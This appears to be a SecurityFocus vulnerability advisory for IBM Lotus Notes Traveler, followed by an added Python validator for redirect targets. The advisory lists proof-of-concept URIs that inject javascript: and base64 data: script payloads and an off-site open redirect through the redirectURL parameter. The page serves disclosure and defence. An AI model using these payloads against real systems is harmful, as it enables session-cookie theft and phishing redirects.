IBM Lotus Notes Traveler Multiple Input Validation Vulnerabilities

An attacker must trick an unsuspecting victim into following a malicious URI to exploit the URI redirection and cross-site scripting issues. An attacker can exploit the HTML-injection issues through a browser.

The following example URIs are available:

http://www.example.com/servlet/traveler?deviceType=700&redirectURL=javascript:alert(document.cookie)

http://www.example.com/servlet/traveler?deviceType=700&redirectURL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://www.example.com/servlet/traveler?deviceType=700&redirectURL=http://websecurity.com.ua
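The three URIs above each abuse the `redirectURL` parameter in a different way: a `javascript:` scheme, a `data:` scheme, and an off-site host. The following is an added example, not code from the advisory or from IBM, of a server-side check that rejects all three and can also be run over request URIs taken from access logs. The function names and the `TRUSTED_HOSTS` value are assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption: the only host the servlet should ever redirect to.
TRUSTED_HOSTS = {"www.example.com"}

def check_redirect_target(target, trusted_hosts=TRUSTED_HOSTS):
    """Return (allowed, reason) for a decoded redirectURL value."""
    # Browsers drop tab/CR/LF inside URLs and treat "\" like "/", so refuse both.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        return (False, "control-char")
    target = target.strip()
    if not target or "\\" in target:
        return (False, "malformed")
    # A path on the same site: one leading slash, not "//host".
    if target.startswith("/") and not target.startswith("//"):
        return (True, "ok")
    try:
        parts = urlsplit(target)
    except ValueError:
        return (False, "malformed")
    scheme = parts.scheme.lower()
    # Rejects javascript:, data:, and scheme-relative "//host" (empty scheme).
    if scheme not in ("http", "https"):
        return (False, "scheme:" + (scheme or "none"))
    host = (parts.hostname or "").lower()
    if host not in trusted_hosts:
        return (False, "offsite:" + host)
    return (True, "ok")

def audit_request(request_uri, param="redirectURL"):
    """Check the redirect parameter of a full request URI, e.g. from an access log."""
    values = parse_qs(urlsplit(request_uri).query).get(param, [])
    if not values:
        return (True, "absent")
    return check_redirect_target(values[0])

# The three example URIs listed on this page.
PAGE_URIS = [
    "http://www.example.com/servlet/traveler?deviceType=700&redirectURL=javascript:alert(document.cookie)",
    "http://www.example.com/servlet/traveler?deviceType=700&redirectURL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B",
    "http://www.example.com/servlet/traveler?deviceType=700&redirectURL=http://websecurity.com.ua",
]

if __name__ == "__main__":
    for uri in PAGE_URIS:
        print(audit_request(uri))
```

The check is an allowlist: anything that is not a same-site path or an `http`/`https` URL on a trusted host is refused, so new schemes do not need to be enumerated.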


 

Copyright 2010, SecurityFocus